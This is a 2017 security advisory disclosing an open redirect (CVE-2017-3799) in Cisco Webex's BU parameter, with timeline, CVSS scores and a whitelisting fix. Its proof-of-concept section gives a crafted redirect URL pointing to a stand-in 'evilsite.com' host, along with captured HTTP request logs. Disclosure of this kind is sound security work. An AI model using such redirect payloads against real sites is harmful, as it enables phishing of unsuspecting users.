Lucene search

K
vulnerlabVulnerability Lab Research Team - Lawrence Amer (www.vulnerability-lab.com/show.php?user=Lawrence Amer)VULNERABLE:1950
HistoryJan 18, 2017 - 12:00 a.m.

Cisco Webex Meeting - Open Redirect Web Vulnerability

2017-01-1800:00:00
Vulnerability Lab Research Team - Lawrence Amer (www.vulnerability-lab.com/show.php?user=Lawrence Amer)
www.vulnerability-lab.com
20

5.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

5.4 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

43.7%

Document Title:
===============
Cisco Webex Meeting - Open Redirect Web Vulnerability 


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=1950

PSIRT ID: 1079904098

Bulletin: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170118-wms4

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-3799

CVE-ID:
=======
CVE-2017-3799


Release Date:
=============
2017-01-18


Vulnerability Laboratory ID (VL-ID):
====================================
1950


Common Vulnerability Scoring System:
====================================
5


Product & Service Introduction:
===============================
See each other with video. Show people what’s on your screen. Make cool stuff together and make things happen. You know us for WebEx. Now meet 
Cisco Spark. Get messaging, meeting, and calling β€” in one service. WebEx brought online meetings to regular people. We had a long time to get it 
right before the knockoffs showed up. Now we power 20 million reliable meetings per month, more than all the knockoffs combined.

(Copy of the Homepage: https://www.webex.com/ )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a redirect web vulnerability in the official Cisco Webex meeting and conferences online software.


Vulnerability Disclosure Timeline:
==================================
2016-09-15: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2016-09-16: Vendor Notification (PSIRT Cisco Security Team)
2016-09-22: Vendor Response/Feedback (PSIRT Cisco Security Team)
2017-01-07: Vendor Fix/Patch (Cisco Service Developer Team)
2017-01-18 Security Acknowledgements  (PSIRT Cisco Security Team)
2017-01-18: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Cisco
Product: Webex Conference Meetings WBS31


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
An open redirect web vulnerability has been discovered in the official Cisco Webex meeting and conferences online software.
The vulnerability allows remote attackers to execute external urls by the internal web-application requests via client-side.

The vulnerability is located in "/sc3100/m.do" module with vulnerable parameter"BU". The vulnerability allows remote attackers 
to prepare client-side malicious urls to external sources. The request method to execute is GET and the vulnerability is located 
on the application-side of the basic conference meeting software. The vulnerability is a classic open redirect web vulnerability.

The security risk of the redirect web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.0. 
Exploitation of the client-side redirect vulnerability requires a low privilege web-application user account and only low user interaction. 
Successful exploitation of the vulnerability results in non-persistent external redirect to malicious sources and client-side phishing.

Request Method(s):
[+] GET

Vulnerable Domain(s):
[+] belkin.webex.com

Vulnerable Module(s):
[+] /sc3100/m.do?AT=JS

Vulnerable Parameter(s):
[+] BU


Proof of Concept (PoC):
=======================
The redirect web vulnerability can be exploited by remote attackers without privileged web-application user account and with medium user interaction.
For security demonstration or to reproduce the redirect web vulnerability follow the provided information and steps below to continue.


PoC: Exploitation (Payload)
http://belkin.webex.com/sc3100/m.do?AT=JS&termscheck=termscheck&renewticket=0&isurlact=true&BU=http://evilsite.com&targetAction=m.do&apiname=m.php&LN=cisco&lastname=Admin&SN=333333333&
firstname=Hacker&targetApp=sc3100&needFilter=false&sessionid=333333333&siteurl=belkin&FN=ciscopwn&rnd=5262984083&entactname=%2Fm.do&entappname=url3100


--- PoC Session Logs [GET] ---
Status: pending[]
GET http://belkin.webex.com/sc3100/m.do?AT=JS&termscheck=termscheck&renewticket=0&isurlact=true&BU=http://evil-site.com&targetAction=m.do&apiname=m.php&LN=cisco&lastname=Admin&SN=333333333&firstname=Hacker&targetApp=sc3100&needFilter=false&sessionid=333333333&siteurl=belkin&FN=ciscopwn&rnd=5262984083&entactname=%2Fm.do&entappname=url3100 
Mime Type[unknown]
   Request Header:
      Host[belkin.webex.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Cookie[NSC_ofcvmbt-ud-wjq=ffffffff09f408b245525d5f4f58455e445a4a4229a1]
-
Status: 200[OK]
GET https://belkin.webex.com/sc3100/m.do?AT=JS&termscheck=termscheck&renewticket=0&isurlact=true&BU=http://evil-site.com&targetAction=m.do&apiname=m.php&LN=cisco&lastname=Admin&SN=333333333&firstname=Hacker&targetApp=sc3100&needFilter=false&sessionid=333333333&siteurl=belkin&FN=ciscopwn&rnd=5262984083&entactname=%2Fm.do&entappname=url3100 
Mime Type[text/html]
   Request Header:
      Host[belkin.webex.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Cookie[JSESSIONID=509C262C0924273E86394937D2D10C5B; trackingSessionID=946717CFD59E4C2CA607475D37FEAEB2; NSC_ofcvmbt-ud-wjq=ffffffff09f408b245525d5f4f58455e445a4a4229a1]
      Connection[keep-alive]
   Response Header:
      Server[Apache]
      trackingID[946717CFD59E4C2CA607475D37FEAEB2_1473937145177]
      x-content-type-options[nosniff]
      X-Permitted-Cross-Domain-Policies[master-only]
      content-security-policy[img-src sip: mailto: data: blob: mediastream: webex.com *.webex.com webex.com.cn *.webex.com.cn webexcc.com *.webexcc.com cisco.com *.cisco.com *.rackcdn.com *.google-analytics.com *.websecurity.norton.com *.paypal.com *.verisign.com wss://*.webex.com:* ws://*.webex.com:* wbx://*.webex.com:* ciscospark.com *.ciscospark.com; font-src sip: mailto: data: blob: mediastream: webex.com *.webex.com webex.com.cn *.webex.com.cn webexcc.com *.webexcc.com cisco.com *.cisco.com *.rackcdn.com *.google-analytics.com *.websecurity.norton.com *.paypal.com *.verisign.com wss://*.webex.com:* ws://*.webex.com:* wbx://*.webex.com:* ciscospark.com *.ciscospark.com; media-src sip: mailto: data: blob: mediastream: webex.com *.webex.com webex.com.cn *.webex.com.cn webexcc.com *.webexcc.com cisco.com *.cisco.com *.rackcdn.com *.google-analytics.com *.websecurity.norton.com *.paypal.com *.verisign.com wss://*.webex.com:* ws://*.webex.com:* wbx://*.webex.com:* ciscospark.com *.ciscospark.com; default-src 'self' 'unsafe-inline' 'unsafe-eval' sip: mailto: data: blob: mediastream: webex.com *.webex.com webex.com.cn *.webex.com.cn webexcc.com *.webexcc.com cisco.com *.cisco.com *.rackcdn.com *.google-analytics.com *.websecurity.norton.com *.paypal.com *.verisign.com wss://*.webex.com:* ws://*.webex.com:* wbx://*.webex.com:* ciscospark.com *.ciscospark.com]
      X-Frame-Options[SAMEORIGIN]
      Strict-Transport-Security[max-age=31536000; includeSubDomains;preload]
      X-XSS-Protection[1; mode=block]
      P3P[CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"]
      Content-Type[text/html]
      Content-Length[952]
      Keep-Alive[timeout=5, max=99]
      Connection[Keep-Alive]
-
Status: 200[OK]
GET https://belkin.webex.com/sc3100/supportcenter/meeting/jump.do?AT=JS&termscheck=termscheck&renewticket=0&isurlact=true&BU=http://evil-site.com&targetAction=m.do&apiname=m.php&LN=cisco&lastname=Admin&SN=333333333&firstname=Hacker&targetApp=sc3100&needFilter=false&sessionid=333333333&siteurl=belkin&FN=ciscopwn&rnd=5262984083&entactname=/m.do&entappname=url3100
   Request Header:
      Host[belkin.webex.com]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Referer[https://belkin.webex.com/sc3100/m.do?AT=JS&termscheck=termscheck&renewticket=0&isurlact=true&BU=http://evilsite.com&targetAction=m.do&apiname=m.php&LN=cisco&lastname=Admin&SN=333333333&firstname=Hacker&targetApp=sc3100&needFilter=false&sessionid=333333333&siteurl=belkin&FN=ciscopwn&rnd=5262984083&entactname=%2Fm.do&entappname=url3100]
      Cookie[JSESSIONID=509C262C0924273E86394937D2D10C5B; trackingSessionID=946717CFD59E4C2CA607475D37FEAEB2; NSC_ofcvmbt-ud-wjq=ffffffff09f408b245525d5f4f58455e445a4a4229a1]
      Connection[keep-alive]
      Upgrade-Insecure-Requests[1]
   Response Header:
      Server[Apache]
      content-security-policy[img-src sip: mailto: data: blob: mediastream: webex.com *.webex.com webex.com.cn *.webex.com.cn webexcc.com *.webexcc.com cisco.com *.cisco.com *.rackcdn.com *.google-analytics.com *.websecurity.norton.com *.paypal.com *.verisign.com wss://*.webex.com:* ws://*.webex.com:* wbx://*.webex.com:* ciscospark.com *.ciscospark.com; font-src sip: mailto: data: blob: mediastream: webex.com *.webex.com webex.com.cn *.webex.com.cn webexcc.com *.webexcc.com cisco.com *.cisco.com *.rackcdn.com *.google-analytics.com *.websecurity.norton.com *.paypal.com *.verisign.com wss://*.webex.com:* ws://*.webex.com:* wbx://*.webex.com:* ciscospark.com *.ciscospark.com; media-src sip: mailto: data: blob: mediastream: webex.com *.webex.com webex.com.cn *.webex.com.cn webexcc.com *.webexcc.com cisco.com *.cisco.com *.rackcdn.com *.google-analytics.com *.websecurity.norton.com *.paypal.com *.verisign.com wss://*.webex.com:* ws://*.webex.com:* wbx://*.webex.com:* ciscospark.com *.ciscospark.com; default-src 'self' 'unsafe-inline' 'unsafe-eval' sip: mailto: data: blob: mediastream: webex.com *.webex.com webex.com.cn *.webex.com.cn webexcc.com *.webexcc.com cisco.com *.cisco.com *.rackcdn.com *.google-analytics.com *.websecurity.norton.com *.paypal.com *.verisign.com wss://*.webex.com:* ws://*.webex.com:* wbx://*.webex.com:* ciscospark.com *.ciscospark.com]
      X-Frame-Options[SAMEORIGIN]
      Strict-Transport-Security[max-age=31536000; includeSubDomains;preload]
      X-XSS-Protection[1; mode=block]
      P3P[CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"]
      Content-Type[text/html]
      Connection[Keep-Alive]


Reference(s):
https://belkin.webex.com/
https://belkin.webex.com/sc3100/
https://belkin.webex.com/sc3100/m.do
https://belkin.webex.com/sc3100/supportcenter/
https://belkin.webex.com/sc3100/supportcenter/meeting/
https://belkin.webex.com/sc3100/supportcenter/meeting/jump.do


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure restriction that only redirects to whitelisted source locations. 
As well improve the jump parameter to ensure that the performed request does not redirect a victim to an illegal 
external source via cisco webex software.


Security Risk:
==============
The security risk of the redirect web vulnerability in the cisco webex web-application is estimated as medium. (CVSS 5.0)


Credits & Authors:
==================
Vulnerability Lab Research Team - Lawrence Amer (www.vulnerability-lab.com/show.php?user=Lawrence Amer)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, 
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.

				    Copyright Β© 2017 | Vulnerability Laboratory - [Evolution Security GmbH]β„’



5.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

5.4 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

43.7%

Related for VULNERABLE:1950